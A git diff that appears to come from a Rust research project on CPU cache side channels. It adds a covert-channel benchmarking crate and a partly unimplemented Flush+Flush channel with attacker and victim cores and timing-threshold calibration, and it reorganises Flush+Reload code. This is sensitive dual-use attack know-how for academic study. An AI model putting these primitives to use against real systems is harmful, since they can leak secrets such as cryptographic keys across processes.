+target = "x86_64-unknown-linux-gnu"
diff --git a/covert_channels_evaluation/Cargo.toml b/covert_channels_evaluation/Cargo.toml
new file mode 100644
index 0000000..83c16a7
--- /dev/null
+++ b/covert_channels_evaluation/Cargo.toml
@@ -0,0 +1,13 @@
+[package]
+name = "covert_channels_evaluation"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+rand = "0.7.3"
+bit_field = "0.10.1"
+turn_lock = { path = "../turn_lock" }
+cache_utils = { path = "../cache_utils" }
diff --git a/covert_channels_evaluation/src/lib.rs b/covert_channels_evaluation/src/lib.rs
new file mode 100644
index 0000000..1bad8ce
--- /dev/null
+++ b/covert_channels_evaluation/src/lib.rs
@@ -0,0 +1,222 @@
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+use turn_lock::TurnLock;
+
+const PAGE_SIZE: usize = 1 << 12; // FIXME Magic
+
+// design docs
+
+// Build a channel using x pages + one synchronisation primitive.
+
+// F+R only use one line per page
+// F+F should use several lines per page
+// Each page has 1<<12 bytes / 1<<6 bytes per line, hence 64 lines (or 6 bits of info).
+
+// General structure: two threads, a transmitter and a receiver. The transmitter generates bytes, the receiver reads bytes, and on join the results are compared for accuracy.
+// Also keep time in order to determine duration, in rdtsc ticks and in seconds.
+
+use bit_field::BitField;
+use cache_utils::mmap::MMappedMemory;
+use cache_utils::rdtsc_fence;
+use std::any::Any;
+use std::collections::VecDeque;
+use std::sync::Arc;
+use std::thread;
+
+/**
+ * Safety considerations: implementations do not ensure thread safety; callers need proper locking as needed.
+ */
+pub trait CovertChannel: Send + Sync {
+ const BIT_PER_PAGE: usize;
+ unsafe fn transmit(&self, page: *const u8, bits: &mut BitIterator);
+ unsafe fn receive(&self, page: *const u8) -> Vec<bool>;
+}
+
+pub struct CovertChannelBenchmarkResult {
+ pub num_bytes_transmitted: usize,
+ pub num_bit_errors: usize,
+ pub error_rate: f64,
+ pub time_rdtsc: u64,
+ //pub time_seconds: todo
+}
+
+pub struct BitIterator<'a> {
+ bytes: &'a Vec<u8>,
+ byte_index: usize,
+ bit_index: u8,
+}
+
+impl<'a> BitIterator<'a> {
+ pub fn new(bytes: &'a Vec<u8>) -> BitIterator<'a> {
+ BitIterator {
+ bytes,
+ byte_index: 0,
+ bit_index: 0,
+ }
+ }
+
+ pub fn atEnd(&self) -> bool {
+ self.byte_index >= self.bytes.len()
+ }
+}
+
+impl Iterator for BitIterator<'_> {
+ type Item = bool;
+
+ fn next(&mut self) -> Option<Self::Item> {
+ if let Some(b) = self.bytes.get(self.byte_index) {
+ let r = (b >> (u8::BIT_LENGTH - 1 - self.bit_index as usize)) & 1 != 0;
+ self.bit_index += 1;
+ self.byte_index += self.bit_index as usize / u8::BIT_LENGTH;
+ self.bit_index = self.bit_index % u8::BIT_LENGTH as u8;
+ Some(r)
+ } else {
+ None
+ }
+ }
+}
+
+struct CovertChannelPage {
+ pub turn: TurnLock,
+ pub addr: *const u8,
+}
+
+struct CovertChannelParams<T: CovertChannel + ?Sized> {
+ pages: Vec<CovertChannelPage>,
+ covert_channel: Arc<T>,
+ transmit_core: usize,
+}
+
+unsafe impl<T: CovertChannel + ?Sized> Send for CovertChannelParams<T> {}
+
+fn transmit_thread<T: CovertChannel + ?Sized>(
+ num_bytes: usize,
+ mut params: CovertChannelParams<T>,
+) -> (u64, Vec<u8>) {
+ let mut result = Vec::new();
+ result.reserve(num_bytes);
+ for _ in 0..num_bytes {
+ let byte = rand::random();
+ result.push(byte);
+ }
+ let mut bit_iter = BitIterator::new(&result);
+ let start = unsafe { rdtsc_fence() };
+ while !bit_iter.atEnd() {
+ for page in params.pages.iter_mut() {
+ page.turn.wait();
+ unsafe { params.covert_channel.transmit(page.addr, &mut bit_iter) };
+ page.turn.next();
+ }
+ }
+
+ (start, result)
+}
+
+pub fn benchmark_channel<T: 'static + CovertChannel>(
+ channel: T,
+ num_pages: usize,
+ num_bytes: usize,
+ transmit_core: usize,
+ receive_core: usize,
+) -> CovertChannelBenchmarkResult {
+ // Allocate pages
+ let size = num_pages * PAGE_SIZE;
+ let m = MMappedMemory::new(size);
+ let mut pages_transmit = Vec::new();
+ let mut pages_receive = Vec::new();
+ let array: &[u8] = m.slice();
+ for i in 0..num_pages {
+ let addr = &array[i * PAGE_SIZE] as *const u8;
+ let mut turns = TurnLock::new(2);
+ let mut t_iter = turns.drain(0..);
+ let receive_lock = t_iter.next().unwrap();
+ let transmit_lock = t_iter.next().unwrap();
+ assert!(t_iter.next().is_none());
+ pages_transmit.push(CovertChannelPage {
+ turn: transmit_lock,
+ addr,
+ });
+ pages_receive.push(CovertChannelPage {
+ turn: receive_lock,
+ addr,
+ });
+ }
+ let covert_channel_arc = Arc::new(channel);
+ let params = CovertChannelParams {
+ pages: pages_transmit,
+ covert_channel: covert_channel_arc.clone(),
+ transmit_core,
+ };
+
+ if transmit_core == receive_core {
+ unimplemented!()
+ }
+
+ let helper = thread::spawn(move || transmit_thread(num_bytes, params));
+ // Create the thread parameters
+ let mut received_bytes: Vec<u8> = Vec::new();
+ let mut received_bits = VecDeque::<bool>::new();
+ while received_bytes.len() < num_bytes {
+ for page in pages_receive.iter_mut() {
+ page.turn.wait();
+ let mut bits = unsafe { covert_channel_arc.receive(page.addr) };
+ page.turn.next();
+ received_bits.extend(&mut bits.iter());
+ while received_bits.len() >= u8::BIT_LENGTH {
+ let mut byte = 0;
+ for i in 0..u8::BIT_LENGTH {
+ byte <<= 1;
+ let bit = received_bits.pop_front().unwrap();
+ byte |= bit as u8;
+ }
+ received_bytes.push(byte);
+ }
+ }
+ // TODO
+ // receiver thread
+ }
+ let stop = unsafe { rdtsc_fence() };
+ let r = helper.join();
+ let (start, sent_bytes) = match r {
+ Ok(r) => r,
+ Err(e) => panic!("Join Error: {:?#}"),
+ };
+ assert_eq!(sent_bytes.len(), received_bytes.len());
+ assert_eq!(num_bytes, received_bytes.len());
+
+ let mut num_bit_error = 0;
+ for i in 0..num_bytes {
+ num_bit_error += (sent_bytes[i] ^ received_bytes[i]).count_ones() as usize;
+ }
+
+ let error_rate = (num_bit_error as f64) / ((num_bytes * u8::BIT_LENGTH) as f64);
+ // Create transmit thread
+ CovertChannelBenchmarkResult {
+ num_bytes_transmitted: num_bytes,
+ num_bit_errors: num_bit_error,
+ error_rate,
+ time_rdtsc: stop - start,
+ }
+}
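+
+// Example invocation (sketch; `MyChannel` is a hypothetical CovertChannel
+// implementation): transmit 1 KiB over 4 pages, transmitter on core 2,
+// receiver on core 4.
+// let result = benchmark_channel(MyChannel::new(), 4, 1 << 10, 2, 4);
+// println!("error rate: {}", result.error_rate);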
+
+#[cfg(test)]
+mod tests {
+ use crate::BitIterator;
+
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+
+ #[test]
+ fn test_bit_vec() {
+ let bytes = vec![0x55, 0xf];
+ let bit_iter = BitIterator::new(&bytes);
+ let results = vec![
+ false, true, false, true, false, true, false, true, false, false, false, false, true,
+ true, true, true,
+ ];
+ for (i, bit) in bit_iter.enumerate() {
+ assert_eq!(results[i], bit);
+ }
+ }
+}
diff --git a/flush_flush/.cargo/config b/flush_flush/.cargo/config
new file mode 100644
index 0000000..2f05654
--- /dev/null
+++ b/flush_flush/.cargo/config
@@ -0,0 +1,2 @@
+[build]
+target = "x86_64-unknown-linux-gnu"
diff --git a/flush_flush/Cargo.toml b/flush_flush/Cargo.toml
new file mode 100644
index 0000000..66fee6e
--- /dev/null
+++ b/flush_flush/Cargo.toml
@@ -0,0 +1,12 @@
+[package]
+name = "flush_flush"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+cache_utils = { path = "../cache_utils" }
+cache_side_channel = { path = "../cache_side_channel" }
+nix = "0.18.0"
diff --git a/flush_flush/src/lib.rs b/flush_flush/src/lib.rs
new file mode 100644
index 0000000..c0765a9
--- /dev/null
+++ b/flush_flush/src/lib.rs
@@ -0,0 +1,614 @@
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+
+pub mod naive;
+
+use cache_side_channel::SideChannelError::{AddressNotCalibrated, AddressNotReady};
+use cache_side_channel::{
+ CacheStatus, ChannelFatalError, MultipleAddrCacheSideChannel, SideChannelError,
+ SingleAddrCacheSideChannel,
+};
+use cache_utils::calibration::{
+ calibrate_fixed_freq_2_thread, get_cache_slicing, get_vpn, only_flush, CalibrateOperation2T,
+ CalibrationOptions, HistParams, Verbosity, CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE,
+ CFLUSH_NUM_ITER, PAGE_LEN,
+};
+use cache_utils::calibration::{ErrorPrediction, Slice, Threshold, ThresholdError, AV, SP, VPN};
+use cache_utils::complex_addressing::CacheSlicing;
+use cache_utils::{find_core_per_socket, flush, maccess, noop};
+use nix::sched::{sched_getaffinity, sched_setaffinity, CpuSet};
+use nix::unistd::Pid;
+use std::collections::{HashMap, HashSet};
+use std::fmt;
+use std::fmt::{Debug, Formatter};
+
+pub struct FlushAndFlush {
+ thresholds: HashMap<SP, ThresholdError>,
+ addresses_ready: HashSet<*const u8>,
+ slicing: CacheSlicing,
+ attacker_core: usize,
+ victim_core: usize,
+}
+
+#[derive(Debug)]
+pub enum FlushAndFlushError {
+ NoSlicing,
+}
+
+#[derive(Debug)]
+pub struct SingleFlushAndFlush(FlushAndFlush);
+
+impl SingleFlushAndFlush {
+ pub fn new(attacker_core: usize, victim_core: usize) -> Result<Self, FlushAndFlushError> {
+ FlushAndFlush::new(attacker_core, victim_core).map(|ff| SingleFlushAndFlush(ff))
+ }
+
+ pub fn new_any_single_core() -> Result<(Self, CpuSet, usize), FlushAndFlushError> {
+ FlushAndFlush::new_any_single_core()
+ .map(|(ff, old, core)| (SingleFlushAndFlush(ff), old, core))
+ }
+
+ pub fn new_any_two_core(
+ distinct: bool,
+ ) -> Result<(Self, CpuSet, usize, usize), FlushAndFlushError> {
+ FlushAndFlush::new_any_two_core(distinct)
+ .map(|(ff, old, attacker, victim)| (SingleFlushAndFlush(ff), old, attacker, victim))
+ }
+}
+
+impl SingleAddrCacheSideChannel for SingleFlushAndFlush {
+ unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
+ unsafe { self.0.test_single(addr) }
+ }
+
+ unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
+ unsafe { self.0.prepare_single(addr) }
+ }
+
+ fn victim_single(&mut self, operation: &dyn Fn()) {
+ self.0.victim_single(operation)
+ }
+
+ unsafe fn calibrate_single(
+ &mut self,
+ addresses: impl IntoIterator<Item = *const u8> + Clone,
+ ) -> Result<(), ChannelFatalError> {
+ unsafe { self.0.calibrate_single(addresses) }
+ }
+}
+
+impl FlushAndFlush {
+ pub fn new(attacker_core: usize, victim_core: usize) -> Result<Self, FlushAndFlushError> {
+ if let Some(slicing) = get_cache_slicing(find_core_per_socket()) {
+ if !slicing.can_hash() {
+ return Err(FlushAndFlushError::NoSlicing);
+ }
+
+ let ret = Self {
+ thresholds: Default::default(),
+ addresses_ready: Default::default(),
+ slicing,
+ attacker_core,
+ victim_core,
+ };
+ Ok(ret)
+ } else {
+ Err(FlushAndFlushError::NoSlicing)
+ }
+ }
+
+ // Takes a buffer / list of addresses or pages
+ // Takes a list of core pairs
+ // Run optimized calibration and processes results
+ fn calibration_for_core_pairs<'a>(
+ core_pairs: impl Iterator<Item = (usize, usize)> + Clone,
+ pages: impl Iterator<Item = &'a [u8]>,
+ ) -> Result<HashMap<AV, (ErrorPrediction, HashMap<SP, ThresholdError>)>, FlushAndFlushError>
+ {
+ let core_per_socket = find_core_per_socket();
+
+ let operations = [
+ CalibrateOperation2T {
+ prepare: maccess::<u8>,
+ op: only_flush,
+ name: "clflush_remote_hit",
+ display_name: "clflush remote hit",
+ },
+ CalibrateOperation2T {
+ prepare: noop::<u8>,
+ op: only_flush,
+ name: "clflush_miss",
+ display_name: "clflush miss",
+ },
+ ];
+ const HIT_INDEX: usize = 0;
+ const MISS_INDEX: usize = 1;
+
+ let mut calibrate_results2t_vec = Vec::new();
+
+ for page in pages {
+ // FIXME Cache line size is magic
+ let mut r = unsafe {
+ calibrate_fixed_freq_2_thread(
+ &page[0] as *const u8,
+ 64,
+ page.len() as isize,
+ &mut core_pairs.clone(),
+ &operations,
+ CalibrationOptions {
+ hist_params: HistParams {
+ bucket_number: CFLUSH_BUCKET_NUMBER,
+ bucket_size: CFLUSH_BUCKET_SIZE,
+ iterations: CFLUSH_NUM_ITER << 1,
+ },
+ verbosity: Verbosity::NoOutput,
+ optimised_addresses: true,
+ },
+ core_per_socket,
+ )
+ };
+ calibrate_results2t_vec.append(&mut r);
+ }
+ unimplemented!();
+ }
+
+ fn new_with_core_pairs(
+ core_pairs: impl Iterator<Item = (usize, usize)> + Clone,
+ ) -> Result<(Self, usize, usize), FlushAndFlushError> {
+ let m = MMappedMemory::new(PAGE_LEN);
+ let array: &[u8] = m.slice();
+
+ let res = Self::calibration_for_core_pairs(core_pairs, vec![array].into_iter());
+
+ // Call the calibration function on a local page sized buffer.
+
+ // Classical analysis flow to generate all ASVP, Threshold, Error.
+
+ // Reduction to determine average / max error for each core.
+
+ // Select the proper core
+ unimplemented!();
+ }
+
+ pub fn new_any_single_core() -> Result<(Self, CpuSet, usize), FlushAndFlushError> {
+ // Generate core iterator
+ let mut core_pairs: Vec<(usize, usize)> = Vec::new();
+
+ let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
+
+ for i in 0..CpuSet::count() {
+ if old.is_set(i).unwrap() {
+ core_pairs.push((i, i));
+ }
+ }
+
+ // Generate all single core pairs
+
+ // Call out to private constructor that takes a core pair list, determines best and makes the choice.
+ // The private constructor will set the correct affinity for main (attacker thread)
+
+ Self::new_with_core_pairs(core_pairs.into_iter()).map(|(channel, attacker, victim)| {
+ assert_eq!(attacker, victim);
+ (channel, old, attacker)
+ })
+ }
+
+ pub fn new_any_two_core(
+ distinct: bool,
+ ) -> Result<(Self, CpuSet, usize, usize), FlushAndFlushError> {
+ let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
+
+ let mut core_pairs: Vec<(usize, usize)> = Vec::new();
+
+ for i in 0..CpuSet::count() {
+ if old.is_set(i).unwrap() {
+ for j in 0..CpuSet::count() {
+ if old.is_set(j).unwrap() {
+ if i != j || !distinct {
+ core_pairs.push((i, j));
+ }
+ }
+ }
+ }
+ }
+
+ Self::new_with_core_pairs(core_pairs.into_iter()).map(|(channel, attacker, victim)| {
+ if distinct {
+ assert_ne!(attacker, victim);
+ }
+ (channel, old, attacker, victim)
+ })
+ }
+
+ fn get_slice(&self, addr: *const u8) -> Slice {
+ self.slicing.hash(addr as usize).unwrap()
+ }
+
+ pub fn set_cores(&mut self, attacker: usize, victim: usize) -> Result<(), nix::Error> {
+ let old_attacker = self.attacker_core;
+ let old_victim = self.victim_core;
+
+ self.attacker_core = attacker;
+ self.victim_core = victim;
+
+ let pages: Vec<VPN> = self
+ .thresholds
+ .keys()
+ .map(|sp: &SP| sp.page)
+ //.copied()
+ .collect();
+ match self.recalibrate(pages) {
+ Ok(()) => Ok(()),
+ Err(e) => {
+ self.attacker_core = old_attacker;
+ self.victim_core = old_victim;
+ Err(e)
+ }
+ }
+ }
+
+ fn recalibrate(&mut self, pages: impl IntoIterator<Item = VPN>) -> Result<(), nix::Error> {
+ // unset readiness status.
+ // Call calibration with core pairs with a single core pair
+ // Use results \o/ (or error out)
+
+ unimplemented!();
+ }
+}
+
+impl Debug for FlushAndFlush {
+ fn fmt(&self, f: &mut Formatter<'_>) -> fmt::Result {
+ f.debug_struct("FlushAndFlush")
+ .field("thresholds", &self.thresholds)
+ .field("addresses_ready", &self.addresses_ready)
+ .field("slicing", &self.slicing)
+ .finish()
+ }
+}
+
+use cache_utils::calibration::cum_sum;
+use cache_utils::mmap::MMappedMemory;
+
+impl MultipleAddrCacheSideChannel for FlushAndFlush {
+ const MAX_ADDR: u32 = 3;
+
+ unsafe fn test<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
+ ) -> Result<Vec<(*const u8, CacheStatus)>, SideChannelError> {
+ let mut result = Vec::new();
+ let mut tmp = Vec::new();
+ let mut i = 0;
+ for addr in addresses {
+ i += 1;
+ let t = unsafe { only_flush(*addr) };
+ tmp.push((addr, t));
+ if i == Self::MAX_ADDR {
+ break;
+ }
+ }
+ for (addr, time) in tmp {
+ if !self.addresses_ready.contains(&addr) {
+ return Err(AddressNotReady(*addr));
+ }
+ let vpn: VPN = (*addr as usize) & (!0xfff); // FIXME
+ let slice = self.get_slice(*addr);
+ let threshold_error = &self.thresholds[&SP { slice, page: vpn }];
+ // refactor this into a struct threshold method ?
+ if threshold_error.threshold.is_hit(time) {
+ result.push((*addr, CacheStatus::Hit))
+ } else {
+ result.push((*addr, CacheStatus::Miss))
+ }
+ }
+ Ok(result)
+ }
+
+ unsafe fn prepare<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
+ ) -> Result<(), SideChannelError> {
+ use core::arch::x86_64 as arch_x86;
+ let mut i = 0;
+ let addresses_cloned = addresses.clone();
+ for addr in addresses_cloned {
+ i += 1;
+ let vpn: VPN = get_vpn(*addr);
+ let slice = self.get_slice(*addr);
+ if self.addresses_ready.contains(&addr) {
+ continue;
+ }
+ if !self.thresholds.contains_key(&SP { slice, page: vpn }) {
+ return Err(AddressNotCalibrated(*addr));
+ }
+ if i == Self::MAX_ADDR {
+ break;
+ }
+ }
+ i = 0;
+ for addr in addresses {
+ i += 1;
+ unsafe { flush(*addr) };
+ self.addresses_ready.insert(*addr);
+ if i == Self::MAX_ADDR {
+ break;
+ }
+ }
+ unsafe { arch_x86::_mm_mfence() };
+ Ok(())
+ }
+
+ fn victim(&mut self, operation: &dyn Fn()) {
+ operation(); // TODO use a different helper core ?
+ }
+
+ // TODO
+ // To split into several functions
+ // Calibration
+ // Make predictions out of results -> probably in cache_utils
+ // Compute Threshold & Error
+ // Compute stats from (A,V,S,P) into (A,V), or other models -> in cache_utils
+ // Use a generic function ? fn reduce (HashMap<(A,S,V,P), Result>, Fn (A,S,V,P) -> T, a reduction method)
+
+ // Determine best core (A,V) amongst options -> in here
+ // Extract results out of calibration -> in self.calibrate
+
+ unsafe fn calibrate(
+ &mut self,
+ addresses: impl IntoIterator<Item = *const u8> + Clone,
+ ) -> Result<(), ChannelFatalError> {
+ unimplemented!()
+ /*
+ let mut pages = HashMap::<VPN, HashSet<*const u8>>::new();
+ for addr in addresses {
+ let page = get_vpn(addr);
+ pages.entry(page).or_insert_with(HashSet::new).insert(addr);
+ }
+
+ let core_per_socket = find_core_per_socket();
+
+ let operations = [
+ CalibrateOperation2T {
+ prepare: maccess::<u8>,
+ op: only_flush,
+ name: "clflush_remote_hit",
+ display_name: "clflush remote hit",
+ },
+ CalibrateOperation2T {
+ prepare: noop::<u8>,
+ op: only_flush,
+ name: "clflush_miss",
+ display_name: "clflush miss",
+ },
+ ];
+ const HIT_INDEX: usize = 0;
+ const MISS_INDEX: usize = 1;
+
+ // Generate core iterator
+ let mut core_pairs: Vec<(usize, usize)> = Vec::new();
+
+ let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
+
+ for i in 0..CpuSet::count() {
+ if old.is_set(i).unwrap() {
+ core_pairs.push((i, i));
+ }
+ }
+
+ // Probably needs more metadata
+ let mut per_core: HashMap<usize, HashMap<VPN, HashMap<Slice, (Threshold, f32)>>> =
+ HashMap::new();
+
+ let mut core_averages: HashMap<usize, (f32, u32)> = HashMap::new();
+
+ for (page, _) in pages {
+ let p = page as *const u8;
+ let r = unsafe {
+ calibrate_fixed_freq_2_thread(
+ p,
+ 64, // FIXME : MAGIC
+ PAGE_LEN as isize, // MAGIC
+ &mut core_pairs.clone().into_iter(),
+ &operations,
+ CalibrationOptions {
+ hist_params: HistParams {
+ bucket_number: CFLUSH_BUCKET_NUMBER,
+ bucket_size: CFLUSH_BUCKET_SIZE,
+ iterations: CFLUSH_NUM_ITER << 1,
+ },
+ verbosity: Verbosity::NoOutput,
+ optimised_addresses: true,
+ },
+ core_per_socket,
+ )
+ };
+
+ /* TODO refactor a good chunk of calibration result analysis to make thresholds in a separate function
+ Generating Cumulative Sums and then using that to compute error count for each possible threshold is a recurring joke.
+ It might be worth in a second time to refactor this to handle more generic strategies (such as double thresholds)
+ What about handling non attributes values (time values that are not attributed as hit or miss)
+ */
+
+ /*
+
+ Non Naive F+F flow
+ Vec -> ASVP,Thresholds,Error Does not care as much. Can probably re-use functions to build a single one.
+ Add API to query predicted error rate, compare with covert channel result.
+ */
+
+ for result2t in r {
+ if result2t.main_core != result2t.helper_core {
+ panic!("Unexpected core numbers");
+ }
+ let core = result2t.main_core;
+ match result2t.res {
+ Err(e) => panic!("Oops: {:#?}", e),
+ Ok(results_1t) => {
+ for r1t in results_1t {
+ // This will be turned into map_values style functions + Calibration1T -> Reasonable Type
+
+ // Already handled
+ let offset = r1t.offset;
+ let addr = unsafe { p.offset(offset) };
+ let slice = self.get_slice(addr);
+
+ // To Raw histogram
+ let miss_hist = &r1t.histogram[MISS_INDEX];
+ let hit_hist = &r1t.histogram[HIT_INDEX];
+ if miss_hist.len() != hit_hist.len() {
+ panic!("Maformed results");
+ }
+ let len = miss_hist.len();
+
+ // Cum Sums
+ let miss_cum_sum = cum_sum(miss_hist);
+ let hit_cum_sum = cum_sum(hit_hist);
+ let miss_total = miss_cum_sum[len - 1];
+ let hit_total = hit_cum_sum[len - 1];
+
+ // Error rate per threshold computations
+
+ // Threshold is less than equal => miss, strictly greater than => hit
+ let mut error_miss_less_than_hit = vec![0; len - 1];
+ // Threshold is less than equal => hit, strictly greater than => miss
+ let mut error_hit_less_than_miss = vec![0; len - 1];
+
+ let mut min_error_hlm = u32::max_value();
+ let mut min_error_mlh = u32::max_value();
+
+ for i in 0..(len - 1) {
+ error_hit_less_than_miss[i] =
+ miss_cum_sum[i] + (hit_total - hit_cum_sum[i]);
+ error_miss_less_than_hit[i] =
+ hit_cum_sum[i] + (miss_total - miss_cum_sum[i]);
+
+ if error_hit_less_than_miss[i] < min_error_hlm {
+ min_error_hlm = error_hit_less_than_miss[i];
+ }
+ if error_miss_less_than_hit[i] < min_error_mlh {
+ min_error_mlh = error_miss_less_than_hit[i];
+ }
+ }
+
+ let hlm = min_error_hlm < min_error_mlh;
+
+ let (errors, min_error) = if hlm {
+ (&error_hit_less_than_miss, min_error_hlm)
+ } else {
+ (&error_miss_less_than_hit, min_error_mlh)
+ };
+
+ // Find the min -> gives potential thresholds with info
+ let mut potential_thresholds = Vec::new();
+
+ for i in 0..errors.len() {
+ if errors[i] == min_error {
+ let num_true_hit;
+ let num_false_hit;
+ let num_true_miss;
+ let num_false_miss;
+ if hlm {
+ num_true_hit = hit_cum_sum[i];
+ num_false_hit = miss_cum_sum[i];
+ num_true_miss = miss_total - num_false_hit;
+ num_false_miss = hit_total - num_true_hit;
+ } else {
+ num_true_miss = miss_cum_sum[i];
+ num_false_miss = hit_cum_sum[i];
+ num_true_hit = hit_total - num_false_miss;
+ num_false_hit = miss_total - num_true_miss;
+ }
+ potential_thresholds.push((
+ i,
+ num_true_hit,
+ num_false_hit,
+ num_true_miss,
+ num_false_miss,
+ min_error as f32 / (hit_total + miss_total) as f32,
+ ));
+ }
+ }
+
+ let index = (potential_thresholds.len() - 1) / 2;
+ let (threshold, _, _, _, _, error_rate) = potential_thresholds[index];
+ // insert in per_core
+ if per_core
+ .entry(core)
+ .or_insert_with(HashMap::new)
+ .entry(page)
+ .or_insert_with(HashMap::new)
+ .insert(
+ slice,
+ (
+ Threshold {
+ bucket_index: threshold, // FIXME the bucket to time conversion
+ miss_faster_than_hit: !hlm,
+ },
+ error_rate,
+ ),
+ )
+ .is_some()
+ {
+ panic!("Duplicate slice result");
+ }
+ let core_average = core_averages.get(&core).unwrap_or(&(0.0, 0));
+ let new_core_average =
+ (core_average.0 + error_rate, core_average.1 + 1);
+ core_averages.insert(core, new_core_average);
+ }
+ }
+ }
+ }
+ }
+
+ // We now get ASVP stuff with the correct core(in theory)
+
+ // We now have a HashMap associating stuffs to cores, iterate on it and select the best.
+ let mut best_core = 0;
+
+ let mut best_error_rate = {
+ let ca = core_averages[&0];
+ ca.0 / ca.1 as f32
+ };
+ for (core, average) in core_averages {
+ let error_rate = average.0 / average.1 as f32;
+ if error_rate < best_error_rate {
+ best_core = core;
+ best_error_rate = error_rate;
+ }
+ }
+ let mut thresholds = HashMap::new();
+ println!("Best core: {}, rate: {}", best_core, best_error_rate);
+ let tmp = per_core.remove(&best_core).unwrap();
+ for (page, per_page) in tmp {
+ let page_entry = thresholds.entry(page).or_insert_with(HashMap::new);
+ for (slice, per_slice) in per_page {
+ println!(
+ "page: {:x}, slice: {}, threshold: {:?}, error_rate: {}",
+ page, slice, per_slice.0, per_slice.1
+ );
+ page_entry.insert(slice, per_slice.0);
+ }
+ }
+ self.thresholds = thresholds;
+ println!("{:#?}", self.thresholds);
+
+ // TODO handle error better for affinity setting and other issues.
+
+ self.addresses_ready.clear();
+
+ let mut cpuset = CpuSet::new();
+ cpuset.set(best_core).unwrap();
+ sched_setaffinity(Pid::from_raw(0), &cpuset).unwrap();
+ Ok(())
+ */
+ }
+}
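+
+// Typical single-round use of the channel (sketch; `channel` and `addrs` are
+// hypothetical, and calibration must have succeeded beforehand):
+// unsafe { channel.prepare(&mut addrs.iter()) }?; // flush the target lines
+// channel.victim(&|| victim_access()); // let the victim run
+// let statuses = unsafe { channel.test(&mut addrs.iter()) }?; // flush again and time it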
+
+#[cfg(test)]
+mod tests {
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+}
diff --git a/flush_flush/src/naive.rs b/flush_flush/src/naive.rs
new file mode 100644
index 0000000..e69de29
diff --git a/flush_reload/Cargo.toml b/flush_reload/Cargo.toml
new file mode 100644
index 0000000..34fa174
--- /dev/null
+++ b/flush_reload/Cargo.toml
@@ -0,0 +1,11 @@
+[package]
+name = "flush_reload"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+cache_utils = { path = "../cache_utils" }
+cache_side_channel = { path = "../cache_side_channel" }
diff --git a/flush_reload/src/lib.rs b/flush_reload/src/lib.rs
new file mode 100644
index 0000000..7fa658c
--- /dev/null
+++ b/flush_reload/src/lib.rs
@@ -0,0 +1,18 @@
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+
+use cache_side_channel::{
+ CacheStatus, ChannelFatalError, SideChannelError, SingleAddrCacheSideChannel,
+};
+use cache_utils::calibration::only_reload;
+use cache_utils::flush;
+
+pub mod naive;
+
+#[cfg(test)]
+mod tests {
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+}
diff --git a/aes-t-tables/src/naive_flush_and_reload.rs b/flush_reload/src/naive.rs
similarity index 92%
rename from aes-t-tables/src/naive_flush_and_reload.rs
rename to flush_reload/src/naive.rs
index 2ad891f..0db7214 100644
--- a/aes-t-tables/src/naive_flush_and_reload.rs
+++ b/flush_reload/src/naive.rs
@@ -1,4 +1,6 @@
-use crate::{CacheStatus, ChannelFatalError, SideChannelError, SingleAddrCacheSideChannel};
+use cache_side_channel::{
+ CacheStatus, ChannelFatalError, SideChannelError, SingleAddrCacheSideChannel,
+};
use cache_utils::calibration::only_reload;
use cache_utils::flush;